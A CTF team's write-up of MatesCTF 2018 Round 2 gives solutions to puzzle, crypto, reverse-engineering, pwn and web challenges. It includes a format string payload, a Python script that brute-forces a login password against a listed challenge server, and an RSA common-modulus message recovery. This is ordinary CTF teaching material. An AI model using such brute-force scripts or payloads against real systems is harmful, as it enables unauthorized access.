CTF
Search…
Matesctf - 2018 - Round 2

Sanity Check

1
Rotate to find the flag:
2
3
kc1{sm}htscaX3y4ttXc_nfe
Copied!
solver.py
1
s = "kc1{sm}htscaX3y4ttXc_nfe"
2
out = ""
3
pos = 0
4
for i in range(0, len(s)):
5
if i % 4 == 0 and i != 0:
6
p = 5
7
else:
8
p = 6
9
pos += p
10
out += s[pos%len(s)]
11
print out
Copied!
flag
1
matesctf{s4n1ty_ch3ck}
Copied!

Programming - Math Master

server.py
1
import random
2
import gmpy2
3
import sys
4
5
flag = ''
6
7
def PoW():
8
r = random.getrandbits(1024)
9
p = gmpy2.next_prime(r)
10
print 'Give me a triple that a^2 + b^2 = c^2 mod p (a,b,c > 1)'
11
print 'which r < c < p, r =', r, 'and p =', p
12
try:
13
a,b,c = [int(i) for i in raw_input().split(' ')]
14
if a < 2 or b < 2 or c < r or a > p or b > p or c > p:
15
return False
16
if (a*a + b*b) % p == (c*c) % p:
17
return True
18
return False
19
except:
20
return False
21
22
if __name__ == '__main__':
23
print 'We have a new proof of work system. Hope you can pass it'
24
if not PoW():
25
sys.exit(0)
26
'''
27
Do some thing in here
28
'''
29
print flag
Copied!
(3k)2+(4k)2=(5k)2(3k)^2 + (4k)^2 = (5k)^2
So, just find k.
flag
1
matesctf{w0w!_y0u_4r3_th3_tru3_m4st3r}
Copied!

RE - Some Node

1
Find the flag
2
3
https://pastebin.com/pEH3xMmi
Copied!
Deobfuscate and beautify the js code, we have :
1
var arr = [0x4df, 0x20c, 0x3f5, 0xe7, 0x50a, 0xc0, 0x31e, 0x44e, 0x1a0, 0x409, 0x3a0, 0x48f, 0x54, 0x114, 0x48f, 0x158, 0x4a3, 0xb7, 0x36e, 0x25, 0x26a, 0x14, 0x3d, 0xf5, 0x328, 0x3, 0x9, 0x29f, 0x223, 0x162, 0x2, 0xc3, 0x16c, 0x4b5, 0x14c, 0x26e, 0x18a, 0x1f6, 0x38e, 0x48a, 0x399, 0xd4, 0xb, 0x339, 0x439, 0x35a]
2
var res = ["28147733412126416143356431805908788848700221138704543049914240750210634423746310795983766007927465537337773675180806753151701119440592637649120674223666407488884928441158916203204899710775857273445369674102642893364763591400590102447525349505851152484162354348321887410090849255334994123327420802898472430345805178661836803666639323568991",
3
"4473996724368524833786391433108844308119859952032682936027584205386586896550944640275021793883201700700514551906732365044019104422174629553761105852002509929562143469997523117124506809324566089069073128574094653939495701324286126323872403203843117997709033282947687736178657057176776167569597189544477293458075431109037887022922995862044778186014072",
4
"5221757322360453814399619119797328730081768639738340228795306317929495307424129397533164035147145139501711378195989662703457058674922647017677641997958212209715853394405199698854615367381241522638332855369669637921940456218422736881713766324155332523065076931150147930439076555927630923249342658654421542335027590781652594413705304583637509924249026877718528",
5
"4288796074237034437390498054578069998869358869004476456766478523669292199763563859166332976529271326671723122114069619124487514887631605436360899314383687525668071526886099615149600968654081981644745693079557652346743251676118813596297248841958787152919005957747751054440747976230293600734615766823819034154768821138600838634394395607040",
6
"14076013253790208221380376940543328033797996734937324461092670075568213933095877897871317709593483134711226289488906499692279422330149725140662609542530782668583349028232449084925688965827512898667668297465086787068857681189679064721661863552760708013615289105346008454343049850126111059987669613256302532637101210381393593",
7
"3170984862814335610889394857268118759960325521680787540826832022026645554821331792672346549865014011745531958862686754481741463830750936074693372236094260712570608495334431476244124947276622402417881608109775154769166561656581871",
8
"640534593409367944820111634498760938267977163203823820715780096258045201701884350666759909980314003408439218106009709023441498640277221820882329768881560600249454971874214496593510400",
9
"3054008491803476523991722331221283812575362956565248969531261498410356443440844995468505356120150838872923755597173544178108356009061441377375965518974487023563293955608211326519992225805676224046227075326718674868707224298790643639447097559142628200669923116286300598253677807",
10
"11825467005351759256803982016693419569859778726116603161520080056295405434359637802900995806871281744944894725671551548372627936387090472057639283764362883564011763689677293068969256929904750428106728266855094662559407016466487151568491033269952394841089030309505860777621941045942191545096050",
11
"95315558114905684185983985374975183308951113563062623116475198835692716601937445684935504522932043984030863952175035421805721885279402513792926454829",
12
"568411832949614651671142719945415608127060862485085190627402422679334039283858151423074972328444453188994097026126033531745745182080440373699487557208262922088414788870610222425071924576508046242112164217950489665579590122429337038781735868490767027930556344827671269493314745010314564749975857545925515864563310856530558976",
13
"336977722880191342605575603118791200417398331912137888340963370337110660382606419040522445704275195130010931083480119765953266883459481380782253911818762412576824761062151635689211563031457817906379156566",
14
"550980307981869851269598052405393915654137449193107513051581276222976204511239411472488703652429952478106978377307176964955131352658257626996213492171855578347127673258296322799076009982396194892143126682738410757818300814252177596972575825143602239301940843722620880682241410122913099229483",
15
"2116883984537179161323051237302600348205261488554202476306373757191773587930042802714540061481828893455114076308887612828288496439778691034823640798092679111474708450621749610480729543435147050165775498058724327335652288975750792680298065894794942053493523979750248709053919864532299418562",
16
"69399375244028224296642472209316572707515378986312745114686995580970893877402763319257611514920487047800277191373708351938644016364554332685488473426826389617490173998496242153068462686126093317159995413848975293933851440015669145081177295951049351767703267253592914502486194187",
17
"108069568093999851662822458713653641799313823651313411726442264688305780526449872871578134658368114229428136524302518871595277609778936351286025083447082899477595981950684257493405990766341354174493412441775130883314659513416700069639555437917371",
18
"810168139475125483474436257612533737098123885235428798630565546494464723025531420196151417421770610696476308685128054281577220738814998009464066172718837044339991297438068334616471134595700413548441652396529038549589448408573522520319029333573237076094959436510970778357141221383928802814529338473459789626277378370074639253787522155414409",
19
"25709128146585820308323789054322316306741541122564289869333094354728180791328346068105293286719059385473674347464040003022820308134361990829451853626575214956590963849132803894527744140191922090907047586017660459356274997166009612370291300171348102939148799637979136",
20
"20586947507559441775857953638972752821850324822265326533025116982642596424691534453969981555866296315169930333224915952011544646505792545652650150396785304286172795619455937383787749912084684960586776069292294416743476954660022058721443347705140193251202533638418316582665764995072",
21
"31228646052679859515463165346865716942464022533455185436751817507356247657636130374582296029363951202093935664822422820552386581073358951047329630542546821224082154582056386185405241963474261350635809881772014052271509265044443425580418128640962720914886585048513848597866310933007135087668196645121895054790134905892165910528",
22
"402406390215000280827794679583610110408732123703853481176670825453960685564431613879605832281716093912057305520208643580463751956991954154250304497560335889609341867460347361654352493185289131298557807863773711898310920025355446196482988507754127542467837062283029214819629978834345",
23
"45248618545403619762841478032308849940249937192500109908548344603743340141365377191917807648219437711559443118349663821666714276892426064382596581675506",
24
"4851890390156174270135015984067408628443606400167912403797688925806912120242318647460426393207026321666262379026053686013574664475317152408144154745390289512723808744249055757655231288588261603032037978960629407963317577071005529207550710551649520103710842971763164677843537776551079122571097576939749759108109841488895365934592210991209564188234383045302346014616009"];
25
const BigNumber = require("bignumber.js")
26
BigNumber.config({
27
POW_PRECISION: 0
28
})
29
const readline = require("readline").createInterface({
30
input: process.stdin,
31
output: process.stdout
32
})
33
readline.question('What is the flag?', c => {
34
for (var d = 0; d < c.length; d = d + 2) {
35
var e = BigNumber(c.charCodeAt(d));
36
var f = BigNumber(c.charCodeAt(d + 1));
37
var g = BigNumber(arr[d]).exponentiatedBy(e);
38
var h = BigNumber(arr[d + 1]).exponentiatedBy(f);
39
if (!BigNumber(res[d / 2]).isEqualTo(g.plus(h))) {
40
console.log('KO');
41
}
42
}
43
console.log("You must know the flag by now!");
44
readline.close();
45
});
Copied!
So the equation we need to solve looks like this
ge+hf=cg^e + h^f = c
Since g, h, c is known and e, f is in string.printable => We can bruteforce it!
flag
1
matesctf{OMG_I'm_s0_t1r3d_0f_m4k1ng_l0ng_fl4g}
Copied!

Pwn - Exploit 101

1
telnet 35.247.166.229 1337
2
3
https://drive.google.com/file/d/1pQQTrpqqDPzYXEOQFAkYACSaBruHO2Wt/view
Copied!
It was simple format string attack. Just input
1
%x %x %x %x %x %x
Copied!
The number you need to find is the 6th

Web - Warm up

1
Warm up
2
3
http://35.187.239.167:8080
4
5
http://125.235.240.167:8080
Copied!
We just need bruteforce the password since if substr(input_password, flag) == True, it will log you in
1
import requests
2
import string
3
flag = "matesctf{"
4
url = "http://125.235.240.167:8080"
5
found = ''
6
while found != '}':
7
for c in string.printable:
8
data ={
9
"username":"admin",
10
"password":flag+c
11
}
12
r = requests.post(url, data)
13
if "Well" in r.text:
14
print flag
15
flag += c
16
found = c
17
pass
Copied!
flag
1
matesctf{suck_a_3cm_weath3r}
Copied!

Crypto - CryptoX

1
Find the flag :D
2
3
https://gist.github.com/minhtt159/8b7715ddd5d03b65d1cd1e4690d11727
Copied!
So basically we know
m65537=c1m^{65537} = c1
m65539=c2m^{65539} = c2
Where c1, c2 are known
From Bézout Identity :
6553732769+65539(32768)=165537 * 32769 + 65539 * (-32768) = 1
To get m, we take :
((m65537)32769(m65539)32768)modn((m^{65537})^{32769} * (m^{65539})^{-32768}) \mod n
It will look like this
1
pow(m1,32769,N) * pow(invert(m2,N),32768,N) % N
Copied!

Crypto - Cookie Generator

1
AFAIK, You can solve this challenge without source
2
3
nc 125.235.240.166 12345
Copied!
Read this write up : (Btw sha256(flag) is a joke...i am so dumb...)
1
matesctf{s33?_y0u_c4n_d0_1t_w1th0ut_s0urc3}
Copied!

Crypto - Fake Tictactoe?

1
Prove that you are tictactoe and you can have the flag
2
3
nc 125.235.240.166 15997
4
5
https://gist.github.com/minhtt159/ab1eea6fc9fa22a8e94b071192e48847
Copied!
We are so lucky, read this write up, everything is there...
1
https://grocid.net/2016/04/14/sctf-ed25519/
Copied!
pow
1
Welcome to the admin panel
2
You can choose one of these keys to sign your message
3
1. 893731438d5dd099be08dd60b0befc32996eda16ea3a0b56d7f261251d27fd62
4
2. b1ecbe4f2573a7dffcb35f9c15c40849fa7504f7e95d44efc967b959da393164
5
3. e5c8620b47d1c4a17b7bb6c48a6a8246a6e58dd8c9a54184b76c1cbedb8f31f2
6
4. 85166ca9caf0385d6aee6973c83ec93887047ec8993e695ba15b9a0a8fa4a35a
7
5. 3be36f7a4d6d2f4970a8a7443d999127949b363fc271e1db1eadac3216072bb8
8
Commands:
9
1. Sign
10
2. Execute
11
Your choice: 2
12
Public key: 5bfcb1cd3938f3f6f3092da5f7d7a1bdb1d694a725d0585a99208787554e110d
13
Your command: tictactoe
14
Your signature: 68299a51b6b592e2db83c26ca3594bdd81bdbb9f11c597a1deb823da7c8b9de82a1db6766d2bc10b4b3d570df4fa549077c125f87d9eb2b031675cc6bec91007
Copied!
flag
1
matesctf{Br1ng_m0r3_Curv3_Plz}
Copied!

Pwn - Xmodem

1
https://github.com/Hi-Im-darkness/CTF/tree/master/matesctf2018/Round2/xmodem
Copied!

RE - Mini Factory

1
https://github.com/kungfulon/matesctf-s3/tree/master/round2/re/MiniFactory
Copied!

Final Scoreboard

Our Team

Nice ctf, nice organizer, kudos to all players!
Last modified 2yr ago